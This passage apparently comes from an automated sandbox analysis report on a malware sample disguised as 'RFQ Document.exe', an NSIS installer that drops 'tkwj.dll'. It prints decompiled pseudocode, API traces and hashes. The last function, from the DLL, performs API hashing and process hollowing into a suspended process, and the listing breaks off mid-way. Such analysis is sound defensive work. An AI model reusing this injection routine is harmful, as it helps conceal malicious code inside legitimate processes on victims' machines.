							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c5d
0x00402c60
0x00402c63
0x00402c66
0x00402c6c
0x00402c7d
0x00402c82
0x00402c95
0x00402c9a
0x00402c9d
0x00402ca3
0x00000000
0x00402ca5
0x00402cb0
0x00402cb6
0x00402cc7
0x00402cce
0x00402cd4
0x00402cd6
0x00402cdb
0x00402cdd
0x00402dca
0x00402dcc
0x00402dd1
0x00402dd8
0x00000000
0x00000000
0x00402dda
0x00402ddd
0x00402e01
0x00402e06
0x00402e0c
0x00402e0e
0x00402e17
0x00402e1c
0x00402e1f
0x00402e20
0x00402e21
0x00402e23
0x00402e28
0x00402e2b
0x00402e3e
0x00402e42
0x00402e4a
0x00402e4f
0x00402e51
0x00402e51
0x00402e51
0x00402e59
0x00402e59
0x00402e5c
0x00402e5d
0x00402e5d
0x00402e60
0x00402e62
0x00402e62
0x00402e62
0x00402e6c
0x00402e72
0x00402e80
0x00402e85
0x00000000
0x00402e85
0x00000000
0x00402e2b
0x00402de5
0x00402df0
0x00402df5
0x00402df7
0x00000000
0x00000000
0x00402dfc
0x00402dff
0x00000000
0x00000000
0x00000000
0x00402ce3
0x00402ce8
0x00402ce8
0x00402ced
0x00402cf1
0x00402cf8
0x00402cfd
0x00402cff
0x00402d01
0x00402d01
0x00402d05
0x00402d0a
0x00402d0c
0x00402e36
0x00402e2d
0x00000000
0x00402e2d
0x00402d12
0x00402d19
0x00402d95
0x00402d99
0x00402d9d
0x00402da2
0x00000000
0x00402d99
0x00402d22
0x00402d27
0x00402d2a
0x00402d2f
0x00000000
0x00000000
0x00402d31
0x00402d38
0x00000000
0x00000000
0x00402d3a
0x00402d41
0x00000000
0x00000000
0x00402d43
0x00402d4a
0x00000000
0x00000000
0x00402d4c
0x00402d53
0x00000000
0x00000000
0x00402d55
0x00402d5b
0x00402d64
0x00402d6a
0x00402d6d
0x00402d6f
0x00402d75
0x00000000
0x00000000
0x00402d7b
0x00402d7f
0x00402d87
0x00402d87
0x00402d8a
0x00402d8d
0x00402d8f
0x00402d91
0x00402d91
0x00000000
0x00402d8f
0x00402d81
0x00402d85
0x00000000
0x00000000
0x00000000
0x00402da3
0x00402da3
0x00402da9
0x00402db5
0x00402db5
0x00402db8
0x00402dbe
0x00402dc0
0x00402dc0
0x00402dc8
0x00402dc8
0x00000000
0x00402dc8

APIs

GetTickCount.KERNEL32 ref: 00402C66
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RFQ Document.exe,00000400), ref: 00402C82

Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RFQ Document.exe,80000000,00000003), ref: 004058A2
Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ Document.exe,C:\Users\user\Desktop\RFQ Document.exe,80000000,00000003), ref: 00402CCE

Strings

Null, xrefs: 00402D4C
C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
soft, xrefs: 00402D43
Inst, xrefs: 00402D3A
Error launching installer, xrefs: 00402CA5
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 00402C55
C:\Users\user\Desktop\RFQ Document.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ Document.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1474117089
Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E8E, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0xdb33
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034("?TA");
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41988c
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41988c
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402e96
0x00402e9a
0x00402e9d
0x00402ea2
0x00402ea4
0x00402ea4
0x00402eab
0x00402eaf
0x00402eb4
0x00402eb6
0x00402eb6
0x00402ebd
0x00402ec2
0x00402ec4
0x00402ecd
0x00402ecd
0x00402ed8
0x00402edf
0x0040305b
0x0040305b
0x00000000
0x00402ee5
0x00402ee9
0x00403046
0x0040309b
0x00403060
0x00403066
0x00403068
0x00403068
0x00403079
0x00000000
0x0040307b
0x0040308e
0x00403040
0x00403040
0x0040305d
0x0040305d
0x00000000
0x00403095
0x00403095
0x00403098
0x00000000
0x00403098
0x0040308e
0x00403079
0x004030a6
0x00000000
0x004030a6
0x0040304b
0x0040304d
0x0040304d
0x00403059
0x004030a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00403059
0x00402ef5
0x00402ef7
0x00402efe
0x00402f05
0x00402f05
0x00402f0c
0x00402f14
0x00402f1e
0x00402f23
0x00402f2b
0x00402f35
0x00402f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f3e
0x00402f3e
0x00402f3e
0x00402f46
0x00402f48
0x00402f48
0x00402f59
0x00000000
0x00000000
0x00402f5f
0x00402f62
0x00402f68
0x00402f6e
0x00402f6e
0x00402f79
0x00402f7f
0x00402f84
0x00402f8b
0x00402f8e
0x00000000
0x00000000
0x00402f94
0x00402f9a
0x00402f9c
0x00402fa5
0x00402fa7
0x00402fd5
0x00402fdb
0x00402fe4
0x00402fe9
0x00402fe9
0x00402ff0
0x00403034
0x00000000
0x00000000
0x00000000
0x00402ff2
0x00402ff5
0x00403017
0x0040301c
0x0040301f
0x00403022
0x00403025
0x00403029
0x00000000
0x00000000
0x00000000
0x0040302f
0x00403003
0x0040300b
0x00000000
0x00403012
0x00403012
0x00000000
0x00403012
0x0040300b
0x00402ff0
0x0040303c
0x00000000
0x0040303c
0x00000000
0x00402f3e

APIs

GetTickCount.KERNEL32 ref: 00402EF5
GetTickCount.KERNEL32 ref: 00402F9C
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
wsprintfA.USER32 ref: 00402FD5
WriteFile.KERNELBASE(00000000,00000000,0041988C,7FFFFFFF,00000000), ref: 00403003

Strings

%p, %u, %s, %p stub., xrefs: 00402F0F
HLA, xrefs: 0040306B
?TA, xrefs: 00402F62, 00402F74
HLA, xrefs: 00402F4B
... %d%%, xrefs: 00402FCF

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FileWritewsprintf
String ID: %p, %u, %s, %p stub.$... %d%%$?TA$HLA$HLA
API String ID: 4209647438-1580550844
Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\jones\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\jones\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}

0x00401751
0x00401758
0x00401761
0x00401764
0x00401767
0x0040176c
0x00401774
0x00401790
0x00401776
0x00401776
0x00401777
0x00401777
0x00401796
0x004017a0
0x004017a0
0x004017a4
0x004017a7
0x004017ac
0x004017ae
0x004017b0
0x004017b5
0x004017b5
0x004017c0
0x004017c0
0x004017d1
0x004017d3
0x004017d3
0x004017d4
0x004017d4
0x004017d7
0x004017da
0x004017dd
0x004017dd
0x004017e4
0x004017f3
0x004017f8
0x004017fb
0x004017fe
0x00000000
0x00000000
0x00401800
0x00401803
0x0040185d
0x00401862
0x004015a8
0x0040268f
0x0040268f
0x004028be
0x004028c1
0x004028c1
0x00000000
0x00401805
0x0040180b
0x00401816
0x00401823
0x0040182e
0x00401844
0x00401844
0x00401847
0x00000000
0x0040184d
0x0040184d
0x0040184e
0x0040186b
0x004028c7
0x004028c7
0x004028c7
0x00401850
0x00401850
0x00401851
0x00401492
0x00402241
0x00402241
0x00402241
0x0040184e
0x00401847
0x004028c9
0x004028cd
0x004028cd
0x0040187b
0x00401880
0x0040188e
0x00401893
0x00401899
0x0040189d
0x0040189f
0x004018a7
0x004018b3
0x004018a1
0x004018a1
0x004018a5
0x00000000
0x00000000
0x004018a5
0x004018bc
0x004018c2
0x004018c4
0x00000000
0x004018ca
0x004018ca
0x004018cd
0x004018e5
0x004018cf
0x004018d2
0x004018db
0x004018db
0x004018ea
0x004018ef
0x0040223c
0x00000000
0x0040223c
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,iqbk Setup,NSIS Error), ref: 00405BD4

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041988C,73BCEA30), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

Strings

C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll, xrefs: 0040181E, 0040183A
TclpOwkq, xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp, xrefs: 0040177E

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp$C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll$TclpOwkq
API String ID: 1941528284-1929184725
Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405380
0x00405384
0x00405387
0x0040538d
0x00405391
0x00405395
0x0040539d
0x004053a4
0x004053aa
0x004053b1
0x004053b8
0x004053c0
0x004053c2
0x00000000
0x004053c2
0x004053cc
0x004053d3
0x004053e9
0x00000000
0x00000000
0x00000000
0x004053eb
0x004053ef

APIs

CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
GetLastError.KERNEL32 ref: 004053CC
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
GetLastError.KERNEL32 ref: 004053EB

Strings

C:\Users\user\Desktop, xrefs: 00405375
\s@, xrefs: 0040537B
Ls@, xrefs: 004053AA

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop$Ls@$\s@
API String ID: 3449924974-3927138272
Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8C13F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6FD8C13F(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E6FD8B737();
				_v68 = E6FD8B7E6(_v12, 0xff7f721a);
				_v76 = E6FD8B7E6(_v12, 0x7fe2736c);
				_v80 = E6FD8B7E6(_v12, 0x7fa1f993);
				_v84 = E6FD8B7E6(_v12, 0x7fa3ef6e);
				_v92 = E6FD8B7E6(_v12, 0xff31bf16);
				_v72 = E6FD8B7E6(_v12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_v88 = E6FD8B7E6(_v12, 0x7fb1f910);
				_v64 = _a4;
				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_push(_a4);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E6FD8B2D7(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E6FD8B2D7(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E6FD8B2D7(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E6FD8B226(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E6FD8B3D8(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}

0x6fd8c14d
0x6fd8c15d
0x6fd8c16d
0x6fd8c17d
0x6fd8c18d
0x6fd8c19d
0x6fd8c1ad
0x6fd8c1b0
0x6fd8c1bd
0x6fd8c1c3
0x6fd8c1cf
0x6fd8c1dc
0x6fd8c1e0
0x6fd8c1e3
0x6fd8c1ed
0x6fd8c1f0
0x6fd8c1f9
0x6fd8c200
0x6fd8c207
0x6fd8c207
0x6fd8c20c
0x6fd8c219
0x6fd8c21c
0x6fd8c225
0x6fd8c22c
0x6fd8c233
0x6fd8c233
0x6fd8c23e
0x6fd8c241
0x6fd8c24c
0x6fd8c24d
0x6fd8c254
0x6fd8c288
0x6fd8c292
0x6fd8c2ab
0x6fd8c2cf
0x6fd8c2dc
0x6fd8c2e2
0x6fd8c30c
